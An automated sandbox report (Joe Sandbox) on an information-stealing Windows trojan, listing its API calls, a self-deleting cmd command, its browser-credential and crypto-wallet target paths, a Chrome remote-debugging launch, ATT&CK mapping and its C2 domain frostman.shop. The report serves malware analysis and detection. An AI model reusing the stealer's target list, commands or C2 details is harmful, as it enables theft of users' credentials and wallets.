                  Source: C:\Users\user\Desktop\ktyihkdfesf.exeCode function: 0_2_00401190 test dword ptr fs:[00000030h], 00000068h0_2_00401190
                  Source: C:\Users\user\Desktop\ktyihkdfesf.exeCode function: 0_2_004011B0 mov eax, dword ptr fs:[00000030h]0_2_004011B0
                  Source: C:\Users\user\Desktop\ktyihkdfesf.exeCode function: 0_2_004108E0 GetProcessHeap,HeapAlloc,GetComputerNameA,0_2_004108E0

                  HIPS / PFW / Operating System Protection Evasion

                  Source: Yara matchFile source: Process Memory Space: ktyihkdfesf.exe PID: 1468, type: MEMORYSTR
                  Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeSection loaded: NULL target: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.55\identity_helper.exe protection: readonlyJump to behavior
                  Source: C:\Users\user\Desktop\ktyihkdfesf.exeCode function: 0_2_00411ED0 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,0_2_00411ED0
                  Source: C:\Users\user\Desktop\ktyihkdfesf.exeCode function: 0_2_00411FA0 CreateToolhelp32Snapshot,Process32First,Process32Next,CloseHandle,Process32Next,StrCmpCA,OpenProcess,TerminateProcess,CloseHandle,0_2_00411FA0
                  Source: C:\Users\user\Desktop\ktyihkdfesf.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c timeout /t 10 & rd /s /q "C:\ProgramData\K6FKFCT00ZU3" & exitJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 10
                  Source: C:\Users\user\Desktop\ktyihkdfesf.exeCode function: GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,GetLocaleInfoA,LocalFree,0_2_004109F0
                  Source: C:\Users\user\Desktop\ktyihkdfesf.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
                  Source: C:\Users\user\Desktop\ktyihkdfesf.exeQueries volume information: C:\ VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\ktyihkdfesf.exeCode function: 0_2_0041D850 GetLocalTime,SystemTimeToFileTime,FileTimeToSystemTime,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,0_2_0041D850
                  Source: C:\Users\user\Desktop\ktyihkdfesf.exeCode function: 0_2_004108B0 GetProcessHeap,HeapAlloc,GetUserNameA,0_2_004108B0
                  Source: C:\Users\user\Desktop\ktyihkdfesf.exeCode function: 0_2_00410990 HeapAlloc,GetProcessHeap,HeapAlloc,GetTimeZoneInformation,wsprintfA,0_2_00410990
                  Source: C:\Users\user\Desktop\ktyihkdfesf.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                  Stealing of Sensitive Information

                  Source: Yara matchFile source: ktyihkdfesf.exe, type: SAMPLE
                  Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
                  Source: Yara matchFile source: 0.2.ktyihkdfesf.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.0.ktyihkdfesf.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: Process Memory Space: ktyihkdfesf.exe PID: 1468, type: MEMORYSTR
                  Source: ktyihkdfesf.exe, 00000000.00000002.2787609891.00000000004DD000.00000004.00000001.01000000.00000003.sdmpString found in binary or memory: ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                  Source: ktyihkdfesf.exe, 00000000.00000002.2787609891.00000000004DD000.00000004.00000001.01000000.00000003.sdmpString found in binary or memory: \Electrum\wallets\
                  Source: ktyihkdfesf.exe, 00000000.00000002.2787609891.00000000004DD000.00000004.00000001.01000000.00000003.sdmpString found in binary or memory: ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                  Source: ktyihkdfesf.exe, 00000000.00000002.2787609891.00000000004DD000.00000004.00000001.01000000.00000003.sdmp String found in binary or memory: \Ethereum\
                  Source: ktyihkdfesf.exe, 00000000.00000002.2787609891.00000000004DD000.00000004.00000001.01000000.00000003.sdmp String found in binary or memory: Ethereum
                  Source: ktyihkdfesf.exe, 00000000.00000002.2787609891.00000000004DD000.00000004.00000001.01000000.00000003.sdmp String found in binary or memory: keystore
                  Source: C:\Users\user\Desktop\ktyihkdfesf.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\monero-project\monero-core
                  Source: C:\Users\user\Desktop\ktyihkdfesf.exe Key opened: HKEY_CURRENT_USER\Software\Martin Prikryl\WinSCP 2\Configuration
                  Source: C:\Users\user\Desktop\ktyihkdfesf.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\datareporting\archived\2023-10\key4.db
                  Source: C:\Users\user\Desktop\ktyihkdfesf.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\crashes\events\key4.db
                  Source: C:\Users\user\Desktop\ktyihkdfesf.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\prefs.js
                  Source: C:\Users\user\Desktop\ktyihkdfesf.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\datareporting\glean\events\key4.db
                  Source: C:\Users\user\Desktop\ktyihkdfesf.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\storage\permanent\chrome\idb\1657114595AmcateirvtiSty.files\key4.db
                  Source: C:\Users\user\Desktop\ktyihkdfesf.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\datareporting\glean\pending_pings\key4.db
                  Source: C:\Users\user\Desktop\ktyihkdfesf.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\saved-telemetry-pings\key4.db
                  Source: C:\Users\user\Desktop\ktyihkdfesf.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\key4.db
                  Source: C:\Users\user\Desktop\ktyihkdfesf.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
                  Source: C:\Users\user\Desktop\ktyihkdfesf.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\places.sqlite
                  Source: C:\Users\user\Desktop\ktyihkdfesf.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cookies.sqlite
                  Source: C:\Users\user\Desktop\ktyihkdfesf.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\storage\permanent\chrome\key4.db
                  Source: C:\Users\user\Desktop\ktyihkdfesf.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\storage\permanent\chrome\idb\3561288849sdhlie.files\key4.db
                  Source: C:\Users\user\Desktop\ktyihkdfesf.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\datareporting\glean\db\key4.db
                  Source: C:\Users\user\Desktop\ktyihkdfesf.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\security_state\key4.db
                  Source: C:\Users\user\Desktop\ktyihkdfesf.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\bookmarkbackups\key4.db
                  Source: C:\Users\user\Desktop\ktyihkdfesf.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\storage\key4.db
                  Source: C:\Users\user\Desktop\ktyihkdfesf.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
                  Source: C:\Users\user\Desktop\ktyihkdfesf.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\storage\permanent\chrome\idb\2823318777ntouromlalnodry--naod.files\key4.db
                  Source: C:\Users\user\Desktop\ktyihkdfesf.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\storage\permanent\key4.db
                  Source: C:\Users\user\Desktop\ktyihkdfesf.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\storage\permanent\chrome\idb\key4.db
                  Source: C:\Users\user\Desktop\ktyihkdfesf.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\0absryc3.default\key4.db
                  Source: C:\Users\user\Desktop\ktyihkdfesf.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.files\key4.db
                  Source: C:\Users\user\Desktop\ktyihkdfesf.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                  Source: C:\Users\user\Desktop\ktyihkdfesf.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\storage\to-be-removed\key4.db
                  Source: C:\Users\user\Desktop\ktyihkdfesf.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\sessionstore-backups\key4.db
                  Source: C:\Users\user\Desktop\ktyihkdfesf.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\key4.db
                  Source: C:\Users\user\Desktop\ktyihkdfesf.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\datareporting\key4.db
                  Source: C:\Users\user\Desktop\ktyihkdfesf.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                  Source: C:\Users\user\Desktop\ktyihkdfesf.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\minidumps\key4.db
                  Source: C:\Users\user\Desktop\ktyihkdfesf.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\storage\permanent\chrome\idb\2918063365piupsah.files\key4.db
                  Source: C:\Users\user\Desktop\ktyihkdfesf.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\storage\permanent\chrome\idb\1451318868ntouromlalnodry--epcr.files\key4.db
                  Source: C:\Users\user\Desktop\ktyihkdfesf.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\datareporting\archived\key4.db
                  Source: C:\Users\user\Desktop\ktyihkdfesf.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\datareporting\glean\tmp\key4.db
                  Source: C:\Users\user\Desktop\ktyihkdfesf.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
                  Source: C:\Users\user\Desktop\ktyihkdfesf.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\crashes\key4.db
                  Source: C:\Users\user\Desktop\ktyihkdfesf.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\datareporting\glean\key4.db
                  Source: C:\Users\user\Desktop\ktyihkdfesf.exe File opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml
                  Source: C:\Users\user\Desktop\ktyihkdfesf.exe File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets\
                  Source: C:\Users\user\Desktop\ktyihkdfesf.exe File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\
                  Source: C:\Users\user\Desktop\ktyihkdfesf.exe File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\
                  Source: C:\Users\user\Desktop\ktyihkdfesf.exe File opened: C:\Users\user\AppData\Roaming\Exodus\
                  Source: C:\Users\user\Desktop\ktyihkdfesf.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\
                  Source: C:\Users\user\Desktop\ktyihkdfesf.exe File opened: C:\Users\user\AppData\Roaming\Exodus\backups\
                  Source: C:\Users\user\Desktop\ktyihkdfesf.exe File opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\
                  Source: C:\Users\user\Desktop\ktyihkdfesf.exe File opened: C:\Users\user\AppData\Roaming\MultiDoge\
                  Source: C:\Users\user\Desktop\ktyihkdfesf.exe File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb\
                  Source: C:\Users\user\Desktop\ktyihkdfesf.exe File opened: C:\Users\user\AppData\Roaming\Binance\
                  Source: C:\Users\user\Desktop\ktyihkdfesf.exe File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\
                  Source: C:\Users\user\Desktop\ktyihkdfesf.exe File opened: C:\Users\user\AppData\Roaming\Ledger Live\Local Storage\leveldb\
                  Source: C:\Users\user\Desktop\ktyihkdfesf.exe File opened: C:\Users\user\AppData\Roaming\Ledger Live\Session Storage\
                  Source: C:\Users\user\Desktop\ktyihkdfesf.exe File opened: C:\Users\user\AppData\Roaming\Ledger Live\
                  Source: C:\Users\user\Desktop\ktyihkdfesf.exe File opened: C:\Users\user\AppData\Roaming\atomic_qt\config\
                  Source: C:\Users\user\Desktop\ktyihkdfesf.exe File opened: C:\Users\user\AppData\Roaming\atomic_qt\exports\
                  Source: C:\Users\user\Desktop\ktyihkdfesf.exe File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\
                  Source: C:\Users\user\Desktop\ktyihkdfesf.exe File opened: C:\Users\user\AppData\Roaming\Guarda\Local Storage\leveldb\
                  Source: Yara match File source: 00000000.00000002.2787609891.00000000004DD000.00000004.00000001.01000000.00000003.sdmp, type: MEMORY
                  Source: Yara match File source: Process Memory Space: ktyihkdfesf.exe PID: 1468, type: MEMORYSTR

                  Remote Access Functionality

                  Source: C:\Users\user\Desktop\ktyihkdfesf.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"
                  Source: Yara match File source: ktyihkdfesf.exe, type: SAMPLE
                  Source: Yara match File source: sslproxydump.pcap, type: PCAP
                  Source: Yara match File source: 0.2.ktyihkdfesf.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara match File source: 0.0.ktyihkdfesf.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara match File source: Process Memory Space: ktyihkdfesf.exe PID: 1468, type: MEMORYSTR
                  | Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact |
                  |---|---|---|---|---|---|---|---|---|---|---|---|---|---|
                  | Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | 3 Native API | 1 DLL Side-Loading | 1 DLL Side-Loading | 1 Deobfuscate/Decode Files or Information | 2 OS Credential Dumping | 2 System Time Discovery | Remote Services | 1 Archive Collected Data | 2 Ingress Tool Transfer | Exfiltration Over Other Network Medium | Abuse Accessibility Features |
                  | Credentials | Domains | Default Accounts | Scheduled Task/Job | 1 Create Account | 1 Extra Window Memory Injection | 1 Obfuscated Files or Information | 1 Credentials in Registry | 1 Account Discovery | Remote Desktop Protocol | 4 Data from Local System | 21 Encrypted Channel | Exfiltration Over Bluetooth | Network Denial of Service |
                  | Email Addresses | DNS Server | Domain Accounts | At | Logon Script (Windows) | 211 Process Injection | 1 DLL Side-Loading | Security Account Manager | 4 File and Directory Discovery | SMB/Windows Admin Shares | Data from Network Shared Drive | 1 Remote Access Software | Automated Exfiltration | Data Encrypted for Impact |
                  | Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | Login Hook | 1 Extra Window Memory Injection | NTDS | 35 System Information Discovery | Distributed Component Object Model | Input Capture | 3 Non-Application Layer Protocol | Traffic Duplication | Data Destruction |
                  | Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 1 Masquerading | LSA Secrets | 11 Query Registry | SSH | Keylogging | 14 Application Layer Protocol | Scheduled Transfer | Data Encrypted for Impact |
                  | Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 1 Virtualization/Sandbox Evasion | Cached Domain Credentials | 111 Security Software Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop |
                  | DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 211 Process Injection | DCSync | 1 Virtualization/Sandbox Evasion | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery |
                  | Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | Indicator Removal from Tools | Proc Filesystem | 12 Process Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement |
                  | Network Topology | Malvertising | Exploit Public-Facing Application | Command and Scripting Interpreter | At | At | HTML Smuggling | /etc/passwd and /etc/shadow | 1 System Owner/User Discovery | Direct Cloud VM Connections | Data Staged | Web Protocols | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Internal Defacement |
                  [Behavior graph: ID 1578709, Sample: ktyihkdfesf.exe, Startdate: 20/12/2024, Architecture: WINDOWS, Score: 100]

Source | Detection | Scanner | Label | Link
ktyihkdfesf.exe | 46% | Virustotal | | Browse
ktyihkdfesf.exe | 55% | ReversingLabs | Win32.Trojan.Generic |
ktyihkdfesf.exe | 100% | Joe Sandbox ML | |
                  No Antivirus matches
                                                                                                                                                                                                                https://unitedstates2.ss.wd.microsoft.us/edgeSettings_2.0-48b11410dc937a1723bf4c5ad33ecdb286d8ec69544241bc373f753e64b396c1.14.drfalse
                                                                                                                                                                                                                  high
                                                                                                                                                                                                                  https://bard.google.com/37ff41ba-8506-49ce-860c-105f54ae7afd.tmp.14.drfalse
                                                                                                                                                                                                                    high
                                                                                                                                                                                                                    https://assets.msn.cn/resolver/2cc80dabc69f58b6_1.14.drfalse
                                                                                                                                                                                                                      high
                                                                                                                                                                                                                      https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696484494400800000.1&ci=1696484494189.12791&ctaktyihkdfesf.exe, 00000000.00000002.2791704824.0000000003BF8000.00000004.00000020.00020000.00000000.sdmp, ktyihkdfesf.exe, 00000000.00000002.2790355832.000000000388B000.00000004.00000020.00020000.00000000.sdmp, ktyihkdfesf.exe, 00000000.00000002.2790355832.0000000003944000.00000004.00000020.00020000.00000000.sdmp, 0HDJEU.0.drfalse
                                                                                                                                                                                                                        high
                                                                                                                                                                                                                        https://frostman.shop;ktyihkdfesf.exe, 00000000.00000002.2787609891.000000000047C000.00000004.00000001.01000000.00000003.sdmpfalse
                                                                                                                                                                                                                          unknown
                                                                                                                                                                                                                          https://browser.events.data.msn.com/2cc80dabc69f58b6_1.14.drfalse
                                                                                                                                                                                                                            high
                                                                                                                                                                                                                            https://t.me/ktyihkdfesf.exe, 00000000.00000002.2788484418.00000000006EE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                              high
                                                                                                                                                                                                                              https://web.whatsapp.com37ff41ba-8506-49ce-860c-105f54ae7afd.tmp.14.drfalse
                                                                                                                                                                                                                                high
                                                                                                                                                                                                                                https://web.telegram.orgktyihkdfesf.exe, 00000000.00000003.2152974492.0000000000765000.00000004.00000020.00020000.00000000.sdmp, ktyihkdfesf.exe, 00000000.00000002.2787609891.000000000044D000.00000004.00000001.01000000.00000003.sdmp, ktyihkdfesf.exe, 00000000.00000002.2788484418.0000000000732000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                  high
                                                                                                                                                                                                                                  https://m.kugou.com/37ff41ba-8506-49ce-860c-105f54ae7afd.tmp.14.drfalse
                                                                                                                                                                                                                                    high
                                                                                                                                                                                                                                    https://www.office.com37ff41ba-8506-49ce-860c-105f54ae7afd.tmp.14.drfalse
                                                                                                                                                                                                                                      high
                                                                                                                                                                                                                                      https://outlook.live.com/mail/0/37ff41ba-8506-49ce-860c-105f54ae7afd.tmp.14.drfalse
                                                                                                                                                                                                                                        high
                                                                                                                                                                                                                                        https://ntp.msn.com/edge/ntp000003.log9.14.dr, 2cc80dabc69f58b6_1.14.drfalse
                                                                                                                                                                                                                                          high
                                                                                                                                                                                                                                          https://assets.msn.com/resolver/2cc80dabc69f58b6_1.14.drfalse
                                                                                                                                                                                                                                            high
                                                                                                                                                                                                                                            https://frostman.shop/vktyihkdfesf.exe, 00000000.00000003.2502205979.0000000000760000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                              unknown
                                                                                                                                                                                                                                              https://powerpoint.new?from=EdgeM365Shoreline37ff41ba-8506-49ce-860c-105f54ae7afd.tmp.14.drfalse
                                                                                                                                                                                                                                                high
                                                                                                                                                                                                                                                https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=ktyihkdfesf.exe, 00000000.00000002.2790355832.00000000038DF000.00000004.00000020.00020000.00000000.sdmp, Web Data.14.dr, V37YCB.0.dr, XBS26P.0.drfalse
                                                                                                                                                                                                                                                  high
                                                                                                                                                                                                                                                  https://frostman.shop/pktyihkdfesf.exe, 00000000.00000003.2502205979.0000000000760000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                    unknown
                                                                                                                                                                                                                                                    https://frostman.shop/~ktyihkdfesf.exe, 00000000.00000003.2502205979.0000000000760000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                      unknown
                                                                                                                                                                                                                                                      https://contile-images.services.mozilla.com/T23eBL4EHswiSaF6kya2gYsRHvdfADK-NYjs1mVRNGE.3351.jpgktyihkdfesf.exe, 00000000.00000002.2791704824.0000000003BF8000.00000004.00000020.00020000.00000000.sdmp, ktyihkdfesf.exe, 00000000.00000002.2790355832.000000000388B000.00000004.00000020.00020000.00000000.sdmp, ktyihkdfesf.exe, 00000000.00000002.2790355832.0000000003944000.00000004.00000020.00020000.00000000.sdmp, 0HDJEU.0.drfalse
                                                                                                                                                                                                                                                        high
                                                                                                                                                                                                                                                        https://frostman.shop/taktyihkdfesf.exe, 00000000.00000002.2788484418.0000000000732000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                          unknown
                                                                                                                                                                                                                                                          • No. of IPs < 25%
                                                                                                                                                                                                                                                          • 25% < No. of IPs < 50%
                                                                                                                                                                                                                                                          • 50% < No. of IPs < 75%
                                                                                                                                                                                                                                                          • 75% < No. of IPs
IP | Domain | Country | ASN | ASN Name | Malicious
23.44.201.16 | unknown | United States | 20940 | AKAMAI-ASN1EU | false
23.44.201.38 | unknown | United States | 20940 | AKAMAI-ASN1EU | false
52.178.17.2 | unknown | United States | 8075 | MICROSOFT-CORP-MSN-AS-BLOCKUS | false
116.203.12.114 | frostman.shop | Germany | 24940 | HETZNER-ASDE | true
149.154.167.99 | t.me | United Kingdom | 62041 | TELEGRAMRU | false
162.159.61.3 | unknown | United States | 13335 | CLOUDFLARENETUS | false
108.139.47.92 | unknown | United States | 16509 | AMAZON-02US | false
23.44.201.22 | unknown | United States | 20940 | AKAMAI-ASN1EU | false
172.217.21.36 | www.google.com | United States | 15169 | GOOGLEUS | false
20.110.205.119 | unknown | United States | 8075 | MICROSOFT-CORP-MSN-AS-BLOCKUS | false
204.79.197.219 | unknown | United States | 8068 | MICROSOFT-CORP-MSN-AS-BLOCKUS | false
142.250.181.65 | googlehosted.l.googleusercontent.com | United States | 15169 | GOOGLEUS | false
172.64.41.3 | chrome.cloudflare-dns.com | United States | 13335 | CLOUDFLARENETUS | false
2.16.158.169 | unknown | European Union | 20940 | AKAMAI-ASN1EU | false
239.255.255.250 | unknown | Reserved | unknown | unknown | false
23.44.201.7 | unknown | United States | 20940 | AKAMAI-ASN1EU | false
23.209.72.43 | unknown | United States | 20940 | AKAMAI-ASN1EU | false
                                                                                                                                                                                                                                                          IP
                                                                                                                                                                                                                                                          192.168.2.6
                                                                                                                                                                                                                                                          127.0.0.1
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1578709
Start date and time: 2024-12-20 07:30:06 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 5m 56s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed: 35
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: ktyihkdfesf.exe
Detection: MAL
Classification: mal100.troj.spyw.evad.winEXE@72/277@22/19
EGA Information:
• Successful, ratio: 100%
HCA Information:
• Successful, ratio: 99%
• Number of executed functions: 66
• Number of non-executed functions: 36
Cookbook Comments:
• Found application associated with file extension: .exe
• Exclude process from analysis (whitelisted): dllhost.exe, BackgroundTransferHost.exe, RuntimeBroker.exe, WMIADAP.exe, SIHClient.exe, backgroundTaskHost.exe, svchost.exe
• Excluded IPs from analysis (whitelisted)
• Excluded domains from analysis (whitelisted)
• Not all processes where analyzed, report is missing behavior information
• Report size exceeded maximum capacity and may have missing behavior information.
• Report size getting too big, too many NtAllocateVirtualMemory calls found.
• Report size getting too big, too many NtCreateFile calls found.
• Report size getting too big, too many NtOpenFile calls found.
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtProtectVirtualMemory calls found.
• Report size getting too big, too many NtQueryAttributesFile calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
• Report size getting too big, too many NtSetInformationFile calls found.
• Report size getting too big, too many NtWriteFile calls found.
• Report size getting too big, too many NtWriteVirtualMemory calls found.
• Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
No simulations
| Match | Associated Sample Name / URL | Detection | Threat Name | Context |
|---|---|---|---|---|
| 23.44.201.16 | file.exe | malicious | Unknown | |
| 23.44.201.38 | https://vk.com/away.php?to=https%3A%2F%2Fhhu.tmw.temporary.site%2Fwp-includes%2Fmyevri&post=809587144_14&cc_key= | malicious | Unknown | |
| 52.178.17.2 | original.eml | malicious | Unknown | |
| | file.exe | malicious | PureCrypter, LummaC, Amadey, LummaC Stealer, Stealc, Vidar | |
